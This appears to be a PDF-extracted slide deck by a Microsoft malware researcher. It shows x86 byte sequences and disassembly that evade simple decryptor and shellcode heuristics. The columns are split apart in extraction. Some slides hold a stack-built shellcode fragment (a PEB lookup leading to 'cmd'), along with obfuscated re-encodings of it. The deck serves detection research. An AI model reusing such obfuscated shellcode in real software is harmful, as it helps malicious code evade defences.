77
77
B0
A2
83
4F
09
88
36
0B
A4
31
56
07
D7
5F
39
67
B6
D3
EE
F1
00
9A
90
94
42
11
49
81
B0
03
42
97
54
16
D8
EB
91
D2
A6
66
ADC
ADC
ADC
AND
AND
SBB
OR
SBB
XOR
CMP
AND
CMP
OR
ADD
ADD
AND
AND
ADD
AND
AND
ADD
ADD
XOR
XOR
ADD
AND
ADC
SBB
SBB
CMP
OR
CMP
Peter Ferrie, Microsoft Corporation
ECX,
EAX,
ESI,
EDI,
ESI,
EAX,
EDX,
EBX,
EDX,
ESI,
EDI,
EBP,
EDI,
EBP,
EBX,
EDX,
EAX,
ESP,
EDX,
ESI,
EBX,
EDX,
ECX,
EDX,
EBX,
ESI,
ESI,
EBX,
EBP,
EBX,
ESI,
EDI,
A4DE2B66
310FB211
561B22A1
079ED301
D7BAD9C9
5F8565FE
396AD235
6756BEBD
B653BA04
D38FCAAC
EE448EBE
F17E3846
003158E1
9A4AF924
90259C0F
942485CC
42FE2F1D
1163B7B6
49C61F4C
81200651
B0923E89
030BD43F
42775883
97778FE1
54B020DF
16A23DCB
D8834285
EB4FD95A
9109B7C2
D288F475
A6363F48
660BD7D5
81
81
81
81
81
81
81
81
81
81
81
81
81
81
81
81
81
81
81
81
81
81
81
81
81
81
81
81
81
81
81
81
EE
FE
FA
F7
E8
F8
CF
F0
ED
EF
D9
FA
C6
EE
F7
EE
D3
DD
EF
EB
C2
E9
FC
C8
F2
D8
E9
EB
FC
F2
D4
CD
3D
A6
83
4B
12
EE
24
EA
14
CD
14
2E
CB
53
C2
2B
82
12
44
38
E5
0F
4C
3F
C1
30
8B
FE
80
26
86
4C
00
27
F4
C4
06
86
F8
F7
91
AD
F4
A3
9D
54
0E
65
DF
EB
55
97
B9
5A
3D
D5
7A
31
B5
18
1E
6E
20
EA
21
3F
C7
BB
CA
A0
14
12
E6
49
A8
97
67
A4
16
F2
6A
79
30
73
A4
2D
C1
80
9D
36
A7
53
0E
68
A2
4D
50
A1
CA
B5
44
6F
0E
2F
40
28
BD
EB
88
70
8B
85
4C
09
6F
C3
64
BD
ED
85
D5
BA
70
D7
C0
DC
F0
70
SUB
CMP
CMP
XOR
SUB
CMP
OR
XOR
SUB
SUB
SBB
CMP
ADD
SUB
XOR
SUB
ADC
SBB
SUB
SUB
ADD
SUB
CMP
OR
XOR
SBB
SUB
SUB
CMP
XOR
ADC
OR
ESI,
ESI,
EDX,
EDI,
EAX,
EAX,
EDI,
EAX,
EBP,
EDI,
ECX,
EDX,
ESI,
ESI,
EDI,
ESI,
EBX,
EBP,
EDI,
EBX,
EDX,
ECX,
ESP,
EAX,
EDX,
EAX,
ECX,
EBX,
ESP,
EDX,
ESP,
EBP,
5021003D
A13F27A6
CAC7F483
B5BBC44B
44CA0612
6FA086EE
0E14F824
2F12F7EA
40E69114
2849ADCD
BDA8F414
EB97A32E
88679DCB
70A45453
8B160EC2
85F2652B
4C6ADF82
0979EB12
6F305544
C3739738
64A4B9E5
BD2D5A0F
EDC13D4C
8580D53F
D59D7AC1
BA363130
70A7B58B
D75318FE
C00E1E80
DC686E26
F0A22086
704DEA4C
47
Counter-examples
81
81
81
81
81
81
81
81
81
81
81
81
81
81
81
81
81
81
81
81
81
81
81
81
81
81
81
81
81
81
81
81
FA
E4
ED
CA
EC
E2
F7
D0
CB
EC
CD
E4
F9
F3
E6
CF
C6
C2
C9
D4
C1
E1
DA
EC
EE
F3
EC
FA
C8
ED
CA
DF
D9
FF
05
2A
3C
1D
C3
37
BC
BB
5A
FF
DF
77
64
60
DD
48
9A
04
BF
B9
56
49
F2
45
F3
CF
39
F1
6C
96
09
FF
D3
10
D8
EF
2C
B2
E0
C8
70
FF
8A
8D
F1
9C
2B
31
8B
8A
CD
B4
DF
C1
B4
3B
E7
A2
87
3C
8C
39
9B
FF
76
0E
05
2A
C8
2A
1F
83
F9
FF
EA
12
B2
A7
20
B4
F3
6D
13
7A
8F
E9
E0
3A
37
C4
0D
6D
FB
EB
A9
FF
F8
4C
02
AF
A4
FB
CD
15
44
FF
BF
C5
05
9D
0A
07
3A
CE
BB
A1
05
B8
B7
AB
49
F9
A8
E2
00
66
CMP
AND
SUB
OR
SUB
AND
XOR
ADC
OR
SUB
OR
AND
CMP
XOR
AND
OR
ADD
ADD
OR
ADC
ADD
AND
SBB
SUB
SUB
XOR
SUB
CMP
OR
SUB
OR
SBB
Peter Ferrie, Microsoft Corporation
EDX,
ESP,
EBP,
EDX,
ESP,
EDX,
EDI,
EAX,
EBX,
ESP,
EBP,
ESP,
ECX,
EBX,
ESI,
EDI,
ESI,
EDX,
ECX,
ESP,
ECX,
ECX,
EDX,
ESP,
ESI,
EBX,
ESP,
EDX,
EAX,
EBP,
EDX,
EDI,
A99B09D9
FFFFFFFF
F876D305
4C0E102A
0205D83C
AF2AEF1D
A4C82CC3
FB2AB237
CD1FE0BC
1583C8BB
44F9705A
FFFFFFFF
BFEA8ADF
C5128D77
05B2F164
9DA79C60
0A202BDD
07B43148
3AF38B9A
CE6D8A04
BB13CDBF
A17AB4B9
058FDF56
B8E9C149
B7E0B4F2
AB3A3B45
4937E7F3
F9C4A2CF
A80D8739
E26D3CF1
00FB8C6C
66EB3996
81
81
81
81
81
81
81
81
81
81
81
81
81
81
81
81
81
81
81
81
81
81
81
81
81
81
81
81
81
81
81
81
C5
EC
F2
CD
D9
E6
F4
DE
CC
CF
EA
EB
E9
F7
C9
CC
CE
E1
F7
FA
F8
F5
EB
E9
EF
FD
C1
CB
FF
D1
F9
F5
F6
0D
6D
41
16
50
E3
D5
00
E3
50
84
78
62
B1
00
D3
86
C1
3C
DF
09
14
B2
D9
BA
5B
DE
B6
7D
AB
1B
8C
18
C7
B7
7A
9E
FE
11
00
15
74
89
C9
1D
5E
00
91
2F
39
98
52
98
EB
37
6C
39
7C
6C
D5
85
59
27
77
C8
EE
EC
0E
00
F0
F1
00
96
2B
4C
3B
08
E8
00
D2
D4
A5
76
17
F6
CD
73
2C
9F
2C
76
A7
D2
17
BD
9C
B6
78
27
5A
5E
87
1D
00
51
A2
BB
D0
67
08
00
A2
36
9A
83
AA
8D
68
E9
1D
27
B9
47
B5
5E
5B
2D
ADD
SUB
XOR
OR
SBB
AND
XOR
SBB
OR
OR
SUB
SUB
SUB
XOR
OR
OR
OR
AND
XOR
CMP
CMP
XOR
SUB
SUB
SUB
CMP
ADD
OR
CMP
ADC
CMP
XOR
EBP,
ESP,
EDX,
EBP,
ECX,
ESI,
ESP,
ESI,
ESP,
EDI,
EDX,
EBX,
ECX,
EDI,
ECX,
ESP,
ESI,
ECX,
EDI,
EDX,
EAX,
EBP,
EBX,
ECX,
EDI,
EBP,
ECX,
EBX,
EDI,
ECX,
ECX,
EBP,
9C778CF6
B6C8180D
78EEC76D
27ECB741
5A0E7A16
5E009E50
87F0FEE3
1DF111D5
00000000
519615E3
A22B7450
BB4C8984
D03BC978
67081D62
08E85EB1
00000000
A2D291D3
36D42F86
9AA539C1
8376983C
AA1752DF
8DF69809
68CDEB14
E97337B2
1D2C6CD9
279F39BA
B92C7C5B
47766CDE
B5A7D5B6
5ED2857D
5B1759AB
2DBD271B
48
Counter-examples
81
81
81
81
81
81
81
81
81
81
81
81
81
81
81
81
81
81
81
81
81
81
81
81
81
81
81
81
81
81
81
81
FF
F4
DD
F2
E2
C4
C9
FF
F0
E3
E7
CD
C0
EE
D9
CF
DD
E1
E4
CB
D0
F3
D6
FF
E3
C3
E1
DE
DE
D7
FD
FD
96
E3
72
98
12
FE
5F
D2
2E
3E
C6
0B
4A
BE
21
0F
42
D8
FF
FA
52
57
64
AA
1B
4E
11
1E
82
12
DA
B4
73
FE
80
CE
82
64
EF
1E
C2
4C
4F
59
C1
7A
E2
5C
27
5C
FF
6F
C5
58
4C
BD
AA
88
E9
AD
42
F8
A3
8E
BB
F0
9A
9A
04
A3
0E
39
6B
DC
19
A8
C0
4D
FF
8A
58
BB
FF
95
6E
F7
29
2B
D1
8D
21
23
30
FE
C4
4F
56
87
BF
FB
EA
DA
73
CD
A4
39
AF
64
41
6C
B5
0C
88
55
FF
3D
4A
E1
3B
D1
28
AC
90
9C
02
13
3A
6E
CMP
XOR
SBB
XOR
AND
ADD
OR
CMP
XOR
AND
AND
OR
ADD
SUB
SBB
OR
SBB
AND
AND
OR
ADC
XOR
ADC
CMP
AND
ADD
AND
SBB
SBB
ADC
CMP
CMP
Peter Ferrie, Microsoft Corporation
EDI,
ESP,
EBP,
EDX,
EDX,
ESP,
ECX,
EDI,
EAX,
EBX,
EDI,
EBP,
EAX,
ESI,
ECX,
EDI,
EBP,
ECX,
ESP,
EBX,
EAX,
EBX,
ESI,
EDI,
EBX,
EBX,
ECX,
ESI,
ESI,
EDI,
EBP,
EBP,
56BB7396
87F0FEE3
BF9A8072
FB9ACE98
EA048212
DAA364FE
730EEF5F
CD391ED2
A46BC22E
39DC4C3E
AF194FC6
64A8590B
41C0C14A
6C4D7ABE
B5FFE221
0C8A5C0F
88582742
55BB5CD8
FFFFFFFF
3D956FFA
4A6EC552
E1F75857
3B294C64
D12BBDAA
28D1AA1B
AC8D884E
9021E911
9C23AD1E
02304282
13FEF812
3AC4A3DA
6E4F8EB4
81
81
81
81
81
81
81
81
81
81
81
81
81
81
81
81
81
81
81
81
81
81
81
81
81
81
81
81
81
81
81
81
E0
E7
F2
ED
C2
EE
CF
CC
C4
C9
D4
CF
F8
C4
FB
ED
F9
FB
E0
C7
E0
FD
E3
E2
CA
F8
DE
EF
CF
C6
E3
E6
8C
03
5F
CE
D0
B3
5D
00
02
48
37
0D
A0
05
45
93
D7
98
05
00
5B
DA
C4
D7
46
CB
D3
78
74
AD
43
28
44
B9
A1
5C
36
FE
8D
00
9B
DC
B0
5D
20
AF
51
15
18
F8
5A
C0
88
99
5D
A1
ED
A2
8B
B3
C4
E5
36
48
41
19
33
5A
C5
60
4C
00
5C
CE
B1
77
F9
FF
7E
1F
B0
5C
AD
73
31
6E
8D
57
29
DC
F3
09
51
29
DB
5A
7F
50
E3
B9
73
4A
3D
00
25
49
16
A1
1B
4D
7D
0A
2F
47
79
DB
D4
4E
EB
B0
34
9B
61
5E
A9
79
79
96
AND
AND
XOR
SUB
ADD
SUB
OR
OR
ADD
OR
ADC
OR
CMP
ADD
CMP
SUB
CMP
CMP
AND
ADD
AND
CMP
AND
AND
OR
CMP
SBB
SUB
OR
ADD
AND
AND
EAX,
EDI,
EDX,
EBP,
EDX,
ESI,
EDI,
ESP,
ESP,
ECX,
ESP,
EDI,
EAX,
ESP,
EBX,
EBP,
ECX,
EBX,
EAX,
EDI,
EAX,
EBP,
EBX,
EDX,
EDX,
EAX,
ESI,
EDI,
EDI,
ESI,
EBX,
ESI,
7F41448C
5019B903
E333A15F
B95A5CCE
73C536D0
4A60FEB3
3D4C8D5D
00000000
255C9B02
49CEDC48
16B1B037
A1775D0D
1BF920A0
4DFFAF05
7D7E5145
0A1F1593
2FB018D7
475CF898
79AD5A05
DB73C000
D431885B
4E6E99DA
EB8D5DC4
B057A1D7
3429ED46
9BDCA2CB
61F38BD3
5E09B378
A951C474
7929E5AD
79DB3643
965A4828
49
Counter-examples
No reads from memory
Store absolute values

68
68
68
68
68
68
68
68
68
68
68
68
68
68
68
68
54
C3
00
00
68
F7
74
45
3A
14
33
3E
3E
77
8B
8B
00
64
56
8B
63
03
3E
75
57
AB
ED
20
78
3C
78
77
8B
67
FF
F4
6D
3C
1C
F3
69
81
45
03
8B
8B
08
1C
78
A1
D7
6A
64
AE
03
8B
6E
3C
8B
DF
5C
74
8B
AD
0C
30
Peter Ferrie, Microsoft Corporation
PUSH
PUSH
PUSH
PUSH
PUSH
PUSH
PUSH
PUSH
PUSH
PUSH
PUSH
PUSH
PUSH
PUSH
PUSH
PUSH
PUSH
RET
D7FF5600
6AF48B00
646D6368
AE3C03F7
031C3E74
8BF37545
6E69573A
3C81AB14
8B45ED33
DF03203E
5C8B783E
748B3C77
8B08788B
AD1C778B
0C788B00
30A16764
ESP
50
Counter-examples
Store absolute values

57
B8
B8
B8
B8
B8
B8
B8
B8
B8
B8
B8
B8
B8
B8
B8
B8
C3
64
00
8B
8B
77
3E
3E
33
14
3A
45
74
F7
68
00
00
67
8B
77
78
3C
78
20
ED
AB
57
75
3E
03
63
8B
56
A1
78
1C
08
8B
8B
03
45
81
69
F3
1C
3C
6D
F4
FF
30
0C
AD
8B
74
5C
DF
8B
3C
6E
8B
03
AE
64
6A
D7
Peter Ferrie, Microsoft Corporation
AB
AB
AB
AB
AB
AB
AB
AB
AB
AB
AB
AB
AB
AB
AB
AB
PUSH
MOV
MOV
MOV
MOV
MOV
MOV
MOV
MOV
MOV
MOV
MOV
MOV
MOV
MOV
MOV
MOV
RET
EDI
EAX,
EAX,
EAX,
EAX,
EAX,
EAX,
EAX,
EAX,
EAX,
EAX,
EAX,
EAX,
EAX,
EAX,
EAX,
EAX,
30A16764
0C788B00
AD1C778B
8B08788B
748B3C77
5C8B783E
DF03203E
8B45ED33
3C81AB14
6E69573A
8BF37545
031C3E74
AE3C03F7
646D6368
6AF48B00
D7FF5600
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
STOSD
STOSD
STOSD
STOSD
STOSD
STOSD
STOSD
STOSD
STOSD
STOSD
STOSD
STOSD
STOSD
STOSD
STOSD
STOSD
51
Counter-examples
Transform absolute values

57
B8
2D
05
2D
2D
2D
05
2D
2D
05
05
2D
05
2D
05
05
C3
64
64
8B
00
14
39
00
0B
1F
26
0B
D1
83
8F
98
00
67
DC
EC
FF
3C
C4
A8
33
42
AC
1E
36
C5
A0
27
CB
A1
28
A3
13
7D
FF
77
BD
C4
E7
89
D6
1F
CE
87
0A
30
24
A0
22
16
17
82
53
4E
31
1D
88
AB
49
06
6D
Peter Ferrie, Microsoft Corporation
AB
AB
AB
AB
AB
AB
AB
AB
AB
AB
AB
AB
AB
AB
AB
AB
PUSH
MOV
SUB
ADD
SUB
SUB
SUB
ADD
SUB
SUB
ADD
ADD
SUB
ADD
SUB
ADD
ADD
RET
EDI
EAX,
EAX,
EAX,
EAX,
EAX,
EAX,
EAX,
EAX,
EAX,
EAX,
EAX,
EAX,
EAX,
EAX,
EAX,
EAX,
30A16764
2428DC64
A0A3EC8B
2213FF00
167D3C14
17FFC439
8277A800
53BD330B
4EC4421F
31E7AC26
1D891E0B
88D636D1
AB1FC583
49CEA08F
06872798
6D0ACB00
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
STOSD
STOSD
STOSD
STOSD
STOSD
STOSD
STOSD
STOSD
STOSD
STOSD
STOSD
STOSD
STOSD
STOSD
STOSD
STOSD
52
Counter-examples
No writes to memory

This space intentionally left blank
Peter Ferrie, Microsoft Corporation
53
Counter-examples
No pointer adjustment
Same as register initialisation

Might be obscure arithmetic
Peter Ferrie, Microsoft Corporation
54
Counter-examples
No loop

6A
59
E8
58
58
5C
59
l1: 49
51
0F
33
64
D0
CE
03
04 00 00 00
95 C1
C0
89 20
C9
PUSH
POP
CALL NEAR
POP
POP
POP
POP
DEC
PUSH
SETNE
XOR
MOV
ROR
INTO
+03
ECX
l1
EAX
EAX
ESP
ECX
ECX
ECX
CL
EAX, EAX
DWORD PTR FS:[EAX], ESP
CL, 01
Does this code run at all?
If so, how does it work?
If it runs, how many times?
Peter Ferrie, Microsoft Corporation
55
Thank you
Check me out: http://pferrie.tripod.com
Questions?
Peter Ferrie, Microsoft Corporation
56